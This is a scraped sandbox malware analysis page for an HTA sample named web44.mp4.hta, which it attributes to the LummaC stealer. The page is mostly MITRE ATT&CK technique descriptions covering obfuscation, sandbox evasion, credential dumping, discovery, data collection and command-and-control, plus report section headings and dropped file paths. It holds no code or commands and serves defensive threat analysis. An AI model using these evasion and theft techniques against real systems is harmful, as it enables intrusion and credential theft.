Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Creation, File: File Metadata, Module: Module Load, Process: OS API Execution, Process: Process Creation, Script: Script Execution, WMI: WMI Creation, Windows Registry: Windows Registry Key Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may perform software packing or virtual machine software protection to conceal their code. Software packing is a method of compressing or encrypting an executable. Packing an executable changes the file signature in an attempt to avoid signature-based detection. Most decompression techniques decompress the executable code in memory. Virtual machine software protection translates an executable's original code into a special format that only a special virtual machine can run. A virtual machine is then called to run this code.
Tactics:	Defense Evasion
Data Sources:	File: File Metadata
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Metadata, File: File Modification, Image: Image Metadata, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, Scheduled Job: Scheduled Job Metadata, Scheduled Job: Scheduled Job Modification, Service: Service Creation, Service: Service Metadata
Platforms:	Containers, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to dump credentials to obtain account login and credential material, normally in the form of a hash or a clear text password, from the operating system and software. Credentials can then be used to perform Lateral Movement and access restricted information.
Tactics:	Credential Access
Data Sources:	Active Directory: Active Directory Object Access, Command: Command Execution, File: File Access, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow, Process: OS API Execution, Process: Process Access, Process: Process Creation, Windows Registry: Windows Registry Key Access
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on a system or in a cloud environment. This may include things such as firewall rules and anti-virus. Adversaries may use the information from Security Software Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Firewall: Firewall Enumeration, Firewall: Firewall Metadata, Process: OS API Execution, Process: Process Creation
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Creation, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may search local system sources, such as file systems and configuration files or local databases, to find files of interest and sensitive data prior to Exfiltration.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Access, Process: OS API Execution, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to take screen captures of the desktop to gather information over the course of an operation. Screen capturing functionality may be included as a feature of a remote access tool used in post-compromise operations. Taking a screenshot is also typically possible through native utilities or API calls, such as `CopyFromScreen` , `xwd` , or `screencapture` .
Tactics:	Collection
Data Sources:	Command: Command Execution, Process: OS API Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may target user email to collect sensitive information. Emails may contain sensitive data, including trade secrets or personal information, that can prove valuable to adversaries. Adversaries can collect or forward email from mail servers or clients.
Tactics:	Collection
Data Sources:	Application Log: Application Log Content, Command: Command Execution, File: File Access, Logon Session: Logon Session Creation, Network Traffic: Network Connection Creation
Platforms:	Google Workspace, Linux, macOS, Office 365, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report web44.mp4.hta

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Threat Intel

Malware Configuration

Threatname: LummaC

Yara Signatures

PCAP (Network Traffic)

Memory Dumps

Unpacked PEs

Sigma Signatures

System Summary

Suricata Signatures

Joe Sandbox Signatures

AV Detection

Cryptography

Compliance

Software Vulnerabilities

Networking

Key, Mouse, Clipboard, Microphone and Screen Capturing

System Summary

Data Obfuscation

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Lowering of HIPS / PFW / Operating System Security Settings

Stealing of Sensitive Information

Remote Access Functionality

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

World Map of Contacted IPs

Public IPs

General Information

Warnings

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache

C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_bd2z3mf3.voi.ps1

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_ewjdg22f.rzm.psm1

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_jknak2fj.a3q.psm1

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_yhrvd4o4.5xj.ps1

Static File Info

General

Network Behavior

Suricata IDS Alerts

Network Port Distribution

TCP Packets

Windows Analysis Report
web44.mp4.hta

Description:	Adversaries may collect data stored in the clipboard from users copying information within or between applications.
Tactics:	Collection
Data Sources:	Command: Command Execution, Process: OS API Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may transfer tools or other files from an external system into a compromised environment. Tools or files may be copied from an external adversary-controlled system to the victim network through the command and control channel or through alternate protocols such as ftp . Once present, adversaries may also transfer/spread tools between victim devices within a compromised environment (i.e. Lateral Tool Transfer ).
Tactics:	Command and Control
Data Sources:	Command: Command Execution, File: File Creation, Network Traffic: Network Connection Creation, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use an OSI non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using OSI application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre